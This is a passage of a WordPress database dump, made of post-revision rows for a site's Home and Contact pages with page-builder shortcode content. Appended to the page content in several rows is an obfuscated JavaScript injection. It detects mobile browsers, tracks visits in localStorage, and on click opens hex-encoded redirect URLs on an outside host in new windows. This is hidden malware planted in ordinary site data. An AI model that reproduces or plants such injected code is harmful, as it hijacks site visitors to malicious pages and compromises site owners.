_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 23:35:27','2022-10-06 23:35:27','',2167,'https://gsw2023.com/?p=2360',0,'revision','',0),
(2361,1,'2022-10-07 00:37:56','2022-10-07 00:37:56','<p>[vc_row equal_height=\"yes\" content_placement=\"top\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529513148816{padding-top: 70px !important;padding-bottom: 30px !important;}\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Get In Touch!\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]Contact Seven Software today and lorem ipsum dolor sit amet glavrida nulla solution sit amet glavrida![/ultimate_heading][/vc_column][vc_column][vc_row_inner equal_height=\"yes\" content_placement=\"top\"][vc_column_inner width=\"1/2\" css=\".vc_custom_1491746397816{padding-bottom: 50px !important;}\"][dt_fancy_image image_id=\"2364\" onclick=\"custom_link\" image_link=\"https://www.google.com/maps/@30.043056,31.232,16z?hl=en\" custom_link_target=\"_blank\" width=\"600\" css=\".vc_custom_1665134722899{padding-bottom: 30px !important;}\"][vc_column_text css=\".vc_custom_1665135195655{padding-bottom: 20px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong>Arab Academy for Science, Technology and Maritime Transport</strong><br />\nWe\'d love to hear from you and this is how you can reach us...</p>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1665135234836{padding-bottom: 20px !important;}\"]</p>\n<p style=\"text-align: center;\"><span style=\"color: #333333;\"><strong>CALL US</strong></span><br />\n2(012) 1000-7979</p>\n<p>[/vc_column_text][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"color: #333333;\"><strong>MAIL</strong></span><br />\nhello@dream-theme.com</p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\" css=\".vc_custom_1491746388981{padding-bottom: 50px !important;}\"][dt_contact_form fields=\"name,email,telephone,country,message\" message_height=\"9\" required=\"name,email,telephone,country,message\" terms=\"y\" terms_msg=\"QnklMjB1c2luZyUyMHRoaXMlMjBmb3JtJTIweW91JTIwYWdyZWUlMjB3aXRoJTIwdGhlJTIwc3RvcmFnZSUyMGFuZCUyMGhhbmRsaW5nJTIwb2YlMjB5b3VyJTIwZGF0YSUyMGJ5JTIwdGhpcyUyMHdlYnNpdGUu\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Contact','','inherit','closed','closed','','53-autosave-v1','','','2022-10-07 00:37:56','2022-10-07 00:37:56','',53,'https://gsw2023.com/?p=2361',0,'revision','',0),
(2362,1,'2022-10-07 00:18:04','2022-10-07 00:18:04','[vc_row equal_height=\"yes\" content_placement=\"top\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529513148816{padding-top: 70px !important;padding-bottom: 30px !important;}\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Get In Touch!\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]Contact Seven Software today and lorem ipsum dolor sit amet glavrida nulla solution sit amet glavrida![/ultimate_heading][/vc_column][vc_column][vc_row_inner equal_height=\"yes\" content_placement=\"top\"][vc_column_inner width=\"1/2\" css=\".vc_custom_1491746397816{padding-bottom: 50px !important;}\"][dt_fancy_image type=\"from_url\" image=\"https://www.google.com/maps/@30.043056,31.232,16z?hl=en\" width=\"600\" css=\".vc_custom_1665134033521{padding-bottom: 30px !important;}\"][vc_column_text css=\".vc_custom_1529940944228{padding-bottom: 20px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"color: #333333;\"><strong>SEVEN SOFTWARE</strong></span>\r\n121 Rock Sreet, 21 Avenue, New York, NY 92103-9000</p>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1529940883052{padding-bottom: 20px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"color: #333333;\"><strong>CALL US</strong></span>\r\n1 (234) 567-891\r\n1 (234) 987-654</p>\r\n[/vc_column_text][vc_column_text]\r\n<p style=\"text-align: center;\"><span style=\"color: #333333;\"><strong>MAIL</strong></span>\r\nhello@dream-theme.com</p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\" css=\".vc_custom_1491746388981{padding-bottom: 50px !important;}\"][dt_contact_form fields=\"name,email,telephone,country,message\" message_height=\"9\" required=\"name,email,message\" terms=\"y\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const 